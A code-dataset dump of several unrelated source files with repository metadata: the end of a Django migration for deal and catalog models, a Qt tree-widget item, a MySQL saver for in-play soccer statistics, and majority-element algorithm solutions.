'is_prefered': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'key_feature': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'offer_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'payment_charges_paid_by': ('django.db.models.fields.CharField', [], {'default': "'chaupaati'", 'max_length': '15'}),
'payment_collection_charges': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'seller': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products_offered'", 'to': "orm['accounts.Account']"}),
'shipping_charges': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'shipping_duration': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'shipping_paid_by': ('django.db.models.fields.CharField', [], {'default': "'vendor'", 'max_length': '15'}),
'short_desc': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'sku': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'stock_status': ('django.db.models.fields.CharField', [], {'default': "'instock'", 'max_length': '100'}),
'transfer_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'visibility_status': ('django.db.models.fields.CharField', [], {'default': "'always_visible'", 'max_length': '100', 'db_index': 'True'}),
'warranty': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'whats_in_the_box': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Client']"}),
'ext_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Account']", 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '100', 'db_index': 'True'}),
'store': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Store']", 'null': 'True', 'blank': 'True'})
},
'categories.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'categories.store': {
'Meta': {'object_name': 'Store'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'dealprops.dailydeal': {
'Meta': {'object_name': 'DailyDeal'},
'ends_on': ('django.db.models.fields.DateTimeField', [], {}),
'features': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'market_price_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'n_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'note_bg_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'product_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'rate_chart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.SellerRateChart']"}),
'starts_on': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'steal_now_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tag_line': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'tag_line_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'todays_steal_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'dealprops.dailydealimage': {
'Meta': {'object_name': 'DailyDealImage'},
'daily_deal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dealprops.DailyDeal']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
}
}
complete_apps = ['dealprops']
| [
"saumil.dalal@futuregroup.in"
] | saumil.dalal@futuregroup.in |
aceb6eae41948f7ba22172a460aa667e1dff7b03 | 4656c9b22bee48b4156eb3524bab3215a1993d83 | /packages/gui/assets_widget/assets_item.py | 1d0fb14b51071fdc41de479eeca1fa77a8ee7819 | [] | no_license | mikebourbeauart/tempaam | 0bc9215de0d967788b3c65b481a5fd3c7153dddc | c2582b5cc1fc45042c5b435f703786d7c04a51a2 | refs/heads/master | 2021-03-27T10:35:43.378899 | 2018-09-06T04:46:18 | 2018-09-06T04:46:18 | 120,359,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from Qt import QtWidgets
class AssetsItem(QtWidgets.QTreeWidgetItem):
    """Tree-widget item representing a single asset in the assets tree view."""

    def __init__(self, *args):
        # Use super() instead of naming the base class directly, so the call
        # chain stays correct under multiple inheritance or a base-class swap.
        super(AssetsItem, self).__init__(*args)
"borbs727@gmail.com"
] | borbs727@gmail.com |
7bee31495c45a466373e68c775248f9c546b3a6c | d1b3c9e1055bc759f5fba8379570ddc20cf4caa5 | /Saver.py | 778690ec07d95b39c92c0776b8afd32ca1b8562c | [] | no_license | woolpeeker/bet365_data | 309b38245c77d9f9387c7d946dbb8410c4c84bc6 | 4cb920095f98faf220c74125d39ccdfe84229ee3 | refs/heads/master | 2020-03-29T22:48:40.234365 | 2018-12-14T03:41:42 | 2018-12-14T03:41:42 | 150,441,477 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,069 | py | import datetime
import traceback
import pymysql
from utils import get_logger
sql_cmd = {
'create_table': "CREATE TABLE inplay ( \
id int NOT NULL AUTO_INCREMENT, PRIMARY KEY (id),\
insert_time datetime NOT NULL, \
crawler varchar(255), \
fp char(255) NOT NULL, \
league char(255), date Date NOT NULL, \
team_h char(255) NOT NULL, team_a char(255) NOT NULL, minute smallint NOT NULL, \
corner_h smallint, corner_a smallint, \
yellow_h smallint, yellow_a smallint, \
red_h smallint, red_a smallint, \
throw_h smallint, throw_a smallint, \
freekick_h smallint, freekick_a smallint, \
goalkick_h smallint, goalkick_a smallint, \
penalty_h smallint, penalty_a smallint, \
goal_h smallint, goal_a smallint, \
attacks_h smallint, attacks_a smallint, \
dangerous_attacks_h smallint, dangerous_attacks_a smallint, \
possession_h smallint, possession_a smallint, \
on_target_h smallint, on_target_a smallint, \
off_target_h smallint, off_target_a smallint, \
odds_fulltime varchar(255), odds_double varchar(255), \
odds_corners varchar(255), odds_asian_corners varchar(255),\
odds_match_goals varchar(255), odds_alter_goals varchar(255), \
odds_goals_odd_even varchar(255), odds_most_corners varchar(255));"
}
class Saver:
    """Persists in-play soccer match snapshots into the MySQL ``soccer.inplay`` table."""

    def __init__(self, name='saver'):
        """Open the database connection and create the ``inplay`` table if missing."""
        self.name = name
        self.logger = get_logger(self.name)
        # autocommit=True: every statement is committed immediately, so the
        # rollback in create_table is effectively a no-op safety net.
        self.conn = pymysql.connect(host="localhost", user="root", password="123456", database="soccer", charset='utf8', autocommit=True)
        if not self.exist_table():
            self.create_table()

    def exist_table(self):
        """Return True if the ``inplay`` table already exists in the ``soccer`` schema."""
        sql = "SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'soccer' and table_name = 'inplay';"
        with self.conn.cursor() as cur:
            cur.execute(sql)
            result = cur.fetchone()
        if result is None:
            self.logger.info("table doesn't exists")
            return False
        self.logger.info('table exists')
        return True

    def create_table(self):
        """Create the ``inplay`` table; raise if creation could not be verified."""
        self.logger.info('create_table')
        sql = sql_cmd['create_table']
        with self.conn.cursor() as cur:
            try:
                cur.execute(sql)
            except Exception:  # narrowed from a bare except; failure is re-checked below
                self.logger.error(traceback.format_exc())
                self.conn.rollback()
        if not self.exist_table():
            self.logger.error('create table Fails.')
            raise Exception('create table Fails.')
        self.logger.info('create table successful')

    def sql_query(self, sql, sql_args):
        """Run a parameterized query and return all rows as a tuple of tuples."""
        self.logger.debug('sql_query: %s args: %s' % (sql, sql_args))
        with self.conn.cursor() as cur:
            cur.execute(sql, sql_args)
            result = cur.fetchall()
        return result

    def process_vals(self, vals):
        """Normalize Python values for the SQL driver.

        ``None``, int, float and str pass through unchanged; ``datetime.date``
        (and datetimes) become ISO strings.  Any other type is stringified and
        logged as an error so the schema mismatch is visible.
        """
        converted = []
        for v in vals:
            if v is None:
                converted.append(None)
            elif isinstance(v, datetime.date):
                converted.append(str(v))
            elif isinstance(v, (int, float, str)):
                converted.append(v)
            else:
                converted.append(str(v))
                self.logger.error("Unexpected datatype, just str it: %s" % type(v))
        return converted

    def sql_insert(self, sample):
        """INSERT one row dict into ``inplay``; dict keys are column names.

        Note: mutates ``sample`` by stamping ``insert_time``.  Errors are
        logged (best-effort insert), not raised.
        """
        self.logger.debug('sql_insert: %s' % sample)
        assert type(sample) == dict
        try:
            sample['insert_time'] = datetime.datetime.now()
            keys = ','.join(sample.keys())
            vals = self.process_vals(sample.values())
            holder = lambda num: ','.join(['%s'] * num)
            sql = 'INSERT INTO inplay ({keys}) VALUES ({vals});'.format(keys=keys, vals=holder(len(vals)))
            sql_args = vals
            self.logger.debug('sql: %s args: %s' % (sql, sql_args))
            with self.conn.cursor() as cur:
                cur.execute(sql, sql_args)
        except Exception:
            self.logger.error('sql_insert error: %s' % sample)
            self.logger.error(traceback.format_exc())
        self.logger.debug('sql_insert success: %s' % sample)

    def insert(self, input):
        """Insert one snapshot, de-duplicating repeated (date, minute) rows per fixture.

        Bug fix: the minute/duplicate checks previously referenced
        ``last_minute``/``last_date`` even when no prior row existed, raising
        NameError on the first-ever snapshot for a team pair.  They now run
        only when a previous row is available.
        """
        self.logger.debug('insert: %s' % input)
        today = datetime.date.today()
        same_team_set = self.sql_query(
            "SELECT id, date, minute FROM inplay WHERE team_h=%s and team_a=%s ORDER BY id;",
            (input['team_h'], input['team_a']))
        if not same_team_set:
            self.logger.debug('same_team_set is empty')
            date = today
        else:
            _id, last_date, last_minute = same_team_set[-1]
            delta = today - last_date
            # Rows within 24h of the last stored one belong to the same match date.
            if delta.total_seconds() < 24 * 3600:
                date = last_date
            else:
                date = today
            # A 90' reading earlier than the last stored minute means the feed
            # wrapped to a new match; flag it with minute == -1.
            if input['minute'] == 90 and input['minute'] < last_minute:
                input['minute'] = -1
            # Skip exact duplicates of the latest stored row.
            if date == last_date and input['minute'] == last_minute:
                return
        input['date'] = date
        input['fp'] = '##'.join([str(input[k]) for k in ['league', 'date', 'team_h', 'team_a']])
        self.sql_insert(input)
| [
"luojiapeng1993@gmail.com"
] | luojiapeng1993@gmail.com |
cc82fb1b7b8286a21e86fe57bd1cbeba056b0bbe | 3cf0d750948a758d5771dd778fbb783d64a044ae | /src/algo_cases/第9章/9_4.py | 1b8b02fc6a55727dfa928a539382f6f384f9e3db | [
"CC-BY-NC-SA-4.0",
"Apache-2.0"
] | permissive | hbulpf/pydemo | 6552a08b3c85721ac1b2ba335b030e234ad03b6c | ea3e9f9086116a86ecef803e9e3179a34c94c20f | refs/heads/master | 2022-11-30T21:06:29.933820 | 2022-01-15T17:05:16 | 2022-01-15T17:05:16 | 237,584,300 | 6 | 1 | Apache-2.0 | 2022-11-22T09:49:38 | 2020-02-01T08:20:43 | Python | UTF-8 | Python | false | false | 1,001 | py | class Solution:
def findnum(self, nums):
def func(low,high):
if low==high:
return nums[low]
mid=low+(high-low)//2
head=func(low,mid)
tail=func(mid+1,high)
if head==tail:
return tail
head_count=sum(1 for i in range(low,high+1) if nums[i]==head)
tail_count=sum(1 for i in range(low,high+1) if nums[i]==tail)
return head if head_count>tail_count else tail
return func(0,len(nums)-1)
class Solution:
    """Majority element via hash-map frequency counting."""

    def findnum(self, nums):
        """Return the most frequent value in ``nums``.

        Uses collections.Counter instead of a hand-rolled dict loop; ties keep
        the first-seen value, matching the original dict/max implementation,
        and an empty input still raises ValueError from max().
        """
        from collections import Counter
        counts = Counter(nums)
        return max(counts, key=counts.get)
class Solution:
    """Majority element via the Boyer-Moore voting algorithm (O(n) time, O(1) space)."""

    def findnum(self, nums):
        """Return the majority element of ``nums`` using pairwise vote cancellation."""
        candidate = nums[0]
        votes = 1
        for value in nums[1:]:
            if votes == 0:
                # Previous candidate fully cancelled out; adopt the current value.
                candidate, votes = value, 1
            elif value == candidate:
                votes += 1
            else:
                votes -= 1
        return candidate
| [
"hudalpf@163.com"
] | hudalpf@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.